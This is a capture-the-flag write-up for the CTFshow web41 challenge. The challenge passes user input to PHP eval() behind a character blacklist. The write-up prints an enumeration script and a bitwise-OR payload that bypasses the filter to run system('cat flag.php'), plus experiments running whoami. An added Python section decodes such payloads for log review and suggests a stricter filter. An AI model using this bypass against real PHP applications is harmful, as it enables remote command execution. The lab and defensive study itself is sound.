CTFshow - Web Basics - Command Execution: web41
Challenge code
<?php
/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show
*/

if(isset($_POST['c'])){
    $c = $_POST['c'];
    if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
The filter in front of the command execution does not block `|`, so the characters we need can be produced by bitwise-ORing pairs of characters that are not filtered.
First, a PHP script enumerates which results the unfiltered characters give when ORed together:
<?php
// Enumerate all 256 byte values for the left operand
for ($i = 0; $i < 256; $i++) {
    // ... and all 256 byte values for the right operand
    for ($j = 0; $j < 256; $j++) {
        $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i';
        // Keep only pairs in which neither byte is caught by the challenge's filter
        if (!preg_match($preg, chr($i)) && !preg_match($preg, chr($j))) {
            $x = chr($i) | chr($j);   // byte-wise OR of the two characters
            // Only report results that are printable ASCII
            if (ord($x) >= 32 && ord($x) <= 126)
                echo $x . " %" . sprintf('%02x', $i) . " %" . sprintf('%02x', $j) . "<br>";
        }
    }
}
The first result listed is the space; for example, to produce `()` you compute `%00%00 | %28%29`.
This challenge needs `system` and `cat flag.php`, which gives c=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%00%06%0c%01%07%00%10%08%10"|"%60%60%60%20%60%60%60%60%2e%60%60%60")
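To make the gap in the filter concrete from the reviewing side, here is an added Python example (not part of the original writeup, and not the challenge's own code). It mirrors the web41 regex byte for byte, resolves every `"A"|"B"` pair in a captured POST body the way PHP's string `|` does so a log reviewer can read what `eval()` would have executed, and compares the original check with a hardened one. The hardened regex, the helper names and the sample body are assumptions made for this example; the sample body is the payload from the writeup above, URL-decoded as PHP does for `$_POST`.

```python
import re
from urllib.parse import unquote_to_bytes

# The challenge's blacklist, copied from the web41 source; PHP's /i flag -> re.IGNORECASE.
# Note what it does NOT list: '|', '(', ')', '"', and every byte below 0x20.
WEB41_FILTER = re.compile(rb'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', re.IGNORECASE)

# Hardened alternative (an assumption for this example, not the challenge's code):
# allow only printable ASCII and refuse the bitwise string operators outright.
# The real fix is of course not to eval() user input at all.
HARDENED_DENY = re.compile(rb'[^\x20-\x7e]|[|&^~]')

def web41_allows(payload: bytes) -> bool:
    """True when the original check would hand the payload to eval()."""
    return WEB41_FILTER.search(payload) is None

def hardened_allows(payload: bytes) -> bool:
    """True when the hardened check would accept the payload."""
    return HARDENED_DENY.search(payload) is None

def or_bytes(a: bytes, b: bytes) -> bytes:
    """PHP's string '|': byte-wise OR, truncated to the shorter operand."""
    return bytes(x | y for x, y in zip(a, b))

# Matches one "A"|"B" pair; negated classes also match NUL and newline bytes.
_PAIR = re.compile(rb'"([^"]*)"\|"([^"]*)"')

def resolve_or_pairs(payload: bytes) -> bytes:
    """Replace each "A"|"B" with the string PHP computes, so a reviewer can read
    what eval("echo(...)") would actually execute."""
    return _PAIR.sub(lambda m: b'"' + or_bytes(m.group(1), m.group(2)) + b'"', payload)

# Constructed sample: the POST parameter c from the writeup, URL-decoded like $_POST.
SAMPLE_C = unquote_to_bytes(
    '("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")'
    '("%03%01%14%00%06%0c%01%07%00%10%08%10"|"%60%60%60%20%60%60%60%60%2e%60%60%60")'
)

if __name__ == "__main__":
    resolved = resolve_or_pairs(SAMPLE_C)
    print("original filter passes raw payload :", web41_allows(SAMPLE_C))      # True
    print("original filter passes resolved one:", web41_allows(resolved))      # False
    print("hardened filter passes raw payload :", hardened_allows(SAMPLE_C))   # False
    print("what eval() would execute          :", resolved.decode())
```

The point the two booleans make: the blacklist only ever inspects the bytes as submitted, while the letters it was meant to stop appear only after PHP evaluates the `|`, so a check that does not also reject control bytes and the bitwise operators cannot see them.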
——————————————
Experiment: PHP behaviour
PHP-7.2.10
<?php
eval("('system')('whoami');");
eval("(hex2bin('13191314050d')|hex2bin('606060606060'))(hex2bin('17080f010d09')|hex2bin('606060606060'));");
echo hex2bin('13191314050d000017080f010d090000')|hex2bin('60606060606028276060606060602729');
eval("hex2bin('13191314050d000017080f010d090000')|hex2bin('60606060606028276060606060602729');");
Output, which shows that the function name and the argument must be built as separate values:
desktop-xxx
desktop-xxx
system('whoami')